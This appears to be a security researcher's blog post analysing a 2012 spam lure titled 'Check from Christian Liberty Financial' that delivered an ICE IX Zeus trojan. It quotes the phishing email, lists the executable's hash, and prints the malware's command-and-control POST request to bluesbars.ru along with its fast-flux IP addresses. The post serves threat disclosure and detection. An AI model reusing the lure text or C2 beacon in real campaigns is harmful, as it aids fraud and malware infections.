Check from Christian Liberty Financial

On 2012-04-02 we observed a spam email via Cisco’s Security Intelligence Operations with the subject line “Check from Christian Liberty Financial, Mon, 2 Apr 2012 12:33:29 +0100”.

This spam message contained the following body:

Advance Notice
|
Enter this code:
SODK2YP7-EO7O-BIVU-8395-4NVDN6VX6O1S
Pay-day Application Enclosed – Please Review
Money Today
Today Only!
1023
Payble to:
*******
amount:
5000.00
—————— AXLB1KQE-IFB0-KP39-C84Y-QRFSYWDQLW61 ——————————————-
Dollars
Money for:
Bills, Shopping, Vacation, Rent, Anything
***** For Immediate Processing Refer to Attached Instructions*****
CAN-SPAM Compliant
E.M.G.
341 Raven Circle
Wyoming, DE 19934

This spam message had a .zip file attached with the filename Your_Check_Details-8857777_042012.zip. This .zip file contained a malicious executable with the following properties:

File: Your_Check_Details_042012.exe
Size: 149504
MD5: A6D4F87E65359ACBB1640611D36E4685

This malicious executable is an ICE IX Zeus variant. This ICE IX Zeus variant communicates with a command and control server at bluesbars.ru via the following POST request:

POST /lampard.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727)
Host: bluesbars.ru
Content-Length: 77
Cache-Control: no-cache

The command and control server was configured to return an encrypted configuration file with the filename “setusating.bin”. During testing the server did not return this file.

It is worthwhile to note that the control server at bluesbars.ru was hosted on a fast flux infrastructure. Via centralops.net we see that bluesbars.ru had an A record with a TTL of 300 seconds and currently resolved to both 217.24.246.7 and 60.19.30.135. This particular fast flux infrastructure is the same infrastructure that was used in the previous spam campaign documented in our post “Triple Barrel Spam Cannon“.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: